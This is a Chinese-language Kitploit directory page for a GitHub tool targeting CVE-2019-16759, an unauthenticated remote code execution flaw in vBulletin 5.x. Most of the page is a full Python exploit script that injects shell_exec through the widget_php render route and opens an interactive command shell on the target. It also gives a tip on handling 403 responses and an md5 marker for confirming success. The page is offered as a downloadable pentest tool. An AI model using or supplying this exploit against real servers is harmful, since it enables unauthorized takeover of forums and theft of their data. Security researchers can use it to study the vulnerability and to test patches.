Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-16759 — vBulletin 5.x 未授权远程代码执行漏洞 | Kitploit
工具/GitHubGitHub/jas502n/cve-2019-16759
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubjas502n/cve-2019-16759

CVE-2019-16759

vBulletin 5.x 未授权远程代码执行漏洞

查看仓库
2166年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-16759 vBulletin 5.x 未授权远程代码执行漏洞

Ps: 有些poc发包过去是403 ,而不是200

增强判断:echo md5('vBulletin'); 判断返回包中是否存在be4ea51d962be8308a0099ae1eb3ec63

print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]

CVE-2019-16759.py

root@kitploit:~
import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

proxies ={
     "http":"http://127.0.0.1:8080/"
}
params = {"routestring":"ajax/render/widget_php"}

while True:
     try:
          cmd = raw_input(">>>Shell= ")
          params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"');echo md5('vBulletin'); exit;"
          r = requests.post(url = sys.argv[1], data = params, proxies=proxies)
          if r.status_code == 200 or r.status_code ==403 and 'be4ea51d962be8308a0099ae1eb3ec63' in r.text:
               print
               print r.text.split('be4ea51d962be8308a0099ae1eb3ec63')[0]
          else:
               sys.exit("Exploit failed! :(")
     except KeyboardInterrupt:
          sys.exit("\nClosing shell...")
     except Exception, e:
          sys.exit(str(e))

参考链接:

https://seclists.org/fulldisclosure/2019/Sep/31

下载工具